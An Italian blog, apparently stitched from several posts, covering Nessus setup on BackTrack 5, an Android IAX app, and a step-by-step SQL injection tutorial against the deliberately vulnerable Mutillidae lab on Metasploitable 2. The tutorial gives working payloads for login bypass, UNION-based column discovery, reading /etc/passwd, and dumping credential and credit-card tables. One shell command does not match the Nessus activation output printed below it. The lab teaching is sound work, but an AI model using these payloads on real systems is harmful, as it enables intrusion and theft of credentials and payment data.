Volendo utilizzare Nessus in ambito personale o per una semplice valutazione, ci si può registrare per un HomeFeed. E’ importante ricordare che l’ HomeFeed è limitato a 16 indirizzi IP per scansione (mentre il ProfessionalFeed consente di scansionare un numero illimitato di indirizzi IP. Il ProfessionalFeed fornisce inoltre l’ accesso a features come “Configuration and Sensitive Data Auditing”, “SCADA plugins”, “Nessus Technical Support” ed anche l’accesso al “Tenable Customer Portal”.

Riceverete in ogni caso l’activation key all’indirizzo di posta elettronica indicato all’ atto della registrazione.

Assicuratevi che la macchina BackTrack5R3 abbia accesso ad Internet ed attivate Nessus utilizzando l’ activation code appena ottenuto:


root@bt:/# apt-key adv --keyserver hkp://88.198.24.12 --recv-keys BDE1XXXXXXXXFD54
Your activation code has been registered properly - thank you.
Now fetching the newest plugin set from plugins.nessus.org...
Your Nessus installation is now up-to-date.
If auto_apdate is set to "yes" in nessusd.conf, Nessus will
update the plugins by itself.


ciò darà anche inizio al download dei plugins in base al feed scelto.

Di seguito, dovremo creare l’utente iniziale per accedere alla Nessus Web Interface:

root@bt:/# /opt/nessus/sbin/nessus-adduser

Aggiunta del primo utente a Nessus

Una volta introdotto uno username, il programma nessus-adduser chiede se tale utente debba possedere privilegi amministrativi o no.
E’ consigliabile che l’utente iniziale abbia privilegi amministrativi, in modo che sia poi possibile usare la interfaccia web per creare ulteriori accounts. L’unica differenza tra un utente amministrativo ed uno comune in Nessus consiste nella possibilità di creare altri accounts.

Avviamo il server Nessus.

Ancora una volta, è possibile ricorrere ad uno script di startup:

root@bt:/# /etc/init.d/nessus start

oppure utilizzare i menu di gnome:

Avvio di Nessus tramite i menu di Gnome

Quando Nessus viene avviato per la prima volta, inizia ad indicizzare e compilare tutti i plugins. Tale operazione può richiedere un certo tempo, dipendente dalla velocità del sistema. Quando Nessus sta ancora processando i plugins, si può osservare la schermata seguente quando si accede alla interfaccia web, richiedendo una connessione HTTPS alla porta TCP 8834 (ad es. https://localhost:8834/). :

Il primo avvio di Nessus

Utilizzando un browser locale alla macchina BackTrack 5, come la versione di Firefox presente, occorre abilitare sia Flash che JavaScript per usare la interfaccia web di Nessus (Flash è necessario per accedere alla Nessus Web Interface, e JavaScript per visualizzare alcuni reports).

La schermata di Login della interfaccia web di Nessus

Send post as PDF to

Si integra facilmente con Asterisk PBX e può essere una buona idea per una telefonia aziendale con soggetti molto mobili, sia in sede che fuori sede, grazie ad un protocollo immune dai problemi di NAT che normalmente affliggono la telefonia VoIP basata su SIP in situazioni analoghe.

Di seguito 2 screenshot della applicazione:

L’applicazione IaxAgent Beta è scaricabile direttamente da play.google.com

Send post as PDF to

Bypass della autenticazione

Quella seguente è una delle pagine (user-info.php) dove si puo fare pratica di SQL Injection, pagina contenente una form di login.
Proviamo ad inserire ‘ (singolo apice) per vedere se così viene generato un errore e come reagisce la applicazione web.

Come si puo osservare nell’immagine precedente, la SQL Query risulta SELECT * FROM accounts WHERE username=”’ AND password=”, e in tal caso sarà possibile attaccare questa applicazione usando un semplice metodo di bypass della autenticazione inserendo ‘ or 1=1 # nel campo login. Dato che la valutazione di 1=1 è sempre TRUE, la query restituisce tutte le colonne della tabella accounts:

La lista completa delle credenziali degli accounts è questa:

Username=admin
Password=adminpass
Signature=Monkey!

Username=adrian
Password=somepassword
Signature=Zombie Films Rock!

Username=ed
Password=pentest
Signature=Commandline KungFu anyone?

SQL-injection utilizzando UNION

Usando Mutillidae, possiamo metodicamente trovare il numero di colonne necessarie ad utilizzare una UNION SQL Injection ed anche determinare quali colonne nella query vengono restituite in output nella web page risultante quando una query viene eseguita con successo. UNION può essere usata per estrarre dati ma solamente se il numero di colonne coincide e il tipo di dato risulta compatible.

Per trovare il numero delle colonne utilizziamo la sintassi ORDER BY incrementando il numero di 1 (e inserendo un carattere di commento al termine).

Inseriremo pertanto nella form di login (indifferentemente nel campo username o password):

' order by 1 #
' order by 2 #
' order by 3 #
' order by 4 #
' order by 5 #

e ottenendo ogni volta una segnalazione di errata autenticazione, fino a che, con “‘ order by 6 #” il sito non restituisca un diverso errore:

rivelando che la tabella ha cinque campi

Ora, possiamo usare UNION SELECT per la raccolta e il riconoscimento delle informazioni.

' union select 1,2,3,4,5 #


I tre numeri che sono apparsi sono i numeri delle colonne dalle quali possiamo ottenere informazioni. Più avanti li sostituiremo con degli statements. Infatti basta rimpiazzare i valori dei tre numeri corrispondenti a quelli utilizzati nella union select.
Provando, ad esempio, così:

' union select 1,2,3,@@version,5 #

oppure

' union select 1,2,3,version(),5 #

otterremmo

Localizzazione della directory del database

Qui faremo semplicemente uso di @@datadir invece di @@version:

' union select 1,@@datadir,3,4,5 #

Risultato:

Username=/var/lib/mysql/
Password=3
Signature=4

Identificazione dell’utente attuale del database

' union select 1,system_user(),3,4,5 #

oppure

' union select 1,user(),3,4,5 #

Risultato:

Username=root@localhost
Password=3
Signature=4

Utilizzo di Load_File per il directory traversal

La funzione MySQLLOAD_FILE() legge un file e ne restituisce il contenuto come una stringa.

' union select 1,2,3,load_file('/etc/passwd'),5 #

Ottenere nomi di tabelle e di colonne

Si può inserire questa sintassi:

' union select NULL,concat(table_name),NULL,NULL,NULL from information_schema.tables where table_schema=database() #

e ottenere:

in modo simile si possono ottenere i nomi di tutte le colonne:

' union select NULL,concat(column_name),NULL,NULL,NULL from information_schema.columns where table_schema=database() #

che restituisce 27 risultati:

Username=cid
Username=username
Username=password
Username=mysignature
Username=is_admin
Username=blogger_name
Username=comment
Username=date
Username=data_id
Username=ip_address
Username=hostname
Username=port
Username=user_agent_string
Username=referrer
Username=data
Username=capture_date
Username=ccid
Username=ccnumber
Username=ccv
Username=expiration
Username=ip
Username=browser
Username=referer
Username=tool_id
Username=tool_name
Username=phase_to_use
Username=tool_type

Cattura di username e passwords presenti nel database della applicazione web

Ora che abbiamo sia i nomi delle tabelle che delle possiamo facilmente relazionarle ed ottenere informazioni da esse. Pertanto possiamo usare il metodo union per trovare le colonne username e password dalla tabella account, risultato che avevamo ottenuto precedentemente con altro metodo (bypass della autenticazione):

' union select 1,username,password,NULL,5 from accounts #

Data la presenza della tabella dal nome più che indicativo di credit_cards, e di nomi di colonna altrettanto indicativi, possiamo ottenerne facilmente il contenuto con

' union select 1,ccnumber,ccv,expiration,5 from credit_cards #


Send post as PDF to

Per accedere ad una particolare applicazione web, si può cliccare su uno dei links presenti. Singole applicazioni web possono inoltre essere raggiunte accodando il nome della directory contenente l’ applicazione ad http://<IP> per creare la URL http://<IP>/<Directory della Applicazione>/. Per esempio, si può accedere alla applicazione Mutillidae (nel nostro caso) all’indirizzo http://192.168.56.101/mutillidae/. Le applicazioni sono installate (in Metasploitable 2) nella directory /var/www.

Vediamone la lista col comando “ls -l /var/www”:

msfadmin@metasploitable:~$ ls -l /var/www
total 72
drwxrwxrwt  2 root     root      4096 2012-05-20 15:30 dav
drwxr-xr-x  8 www-data www-data  4096 2012-05-20 15:52 dvwa
-rw-r--r--  1 www-data www-data   891 2012-05-20 15:31 index.php
drwxr-xr-x 10 www-data www-data  4096 2012-05-14 01:43 mutillidae
-rw-r--r--  1 www-data www-data    19 2010-04-16 02:12 phpinfo.php
drwxr-xr-x 11 www-data www-data  4096 2012-05-14 01:36 phpMyAdmin
drwxr-xr-x  3 www-data www-data  4096 2012-05-14 01:50 test
drwxrwxr-x 22 www-data www-data 20480 2010-04-19 18:54 tikiwiki
drwxrwxr-x 22 www-data www-data 20480 2010-04-16 02:17 tikiwiki-old
drwxr-xr-x  7 www-data www-data  4096 2010-04-16 15:27 twiki

Mutillidae

Mutillidae è una applicazione free ed open source per il website penetration testing/hacking sviluppata da Adrian “Irongeek” Crenshaw e Jeremy “webpwnized” Druin. Essa è progettata per essere violabile e vulnerabile ed lo strumento ideale per l’apprendimento di tecniche come SQL injection, cross site scripting, HTML injection, Javascript injection, clickjacking, local file inclusion, authentication bypass methods, remote code execution e molte altre.
La applicazione web Mutillidae (NOWASP (Mutillidae)) comprende tutte le vulnerabilità presenti nella Top Ten di OWASP (Open Web Application Security Project), più un certo numero di altre vulnerabilità come HTML-5 web storage, forms caching, e click-jacking. Ispirata da DVWA, Mutillidae consente all’ utente di cambiare il “Security Level” da 0 (completamentely insicuro) a 5 (sicuro). In aggiunta vi sono tre livelli di suggerimento da “Level 0 - (nessun suggerimento) a “Level 2 - principiante” (massimo dei suggerimenti). Se la applicazione venisse danneggiata da injections od altri hacks, cliccando il pulsante “Reset DB”, la stessa viene ripristinata al suo stato originale.

DVWA

Dalla home page DVWA: “Damn Vulnerable Web App (DVWA) è una PHP/MySQL web application dannatamente vulnerabile. I suoi scopi principali sono essere uno strumento tramite il quale i professionisti della sicurezza possono testare le proprie capacità, i web developers comprendere meglio come rendere più sicure le applicazioni web e gli insegnanti/studenti insegnare/apprendere la web application security in ambito didattico.”.

DVWA contiene istruzioni sulla home page mentre informazioni aggiuntive sono disponibili tramite le Wiki Pages - Damn Vulnerable Web App.

Default username = admin
Default password = password

Send post as PDF to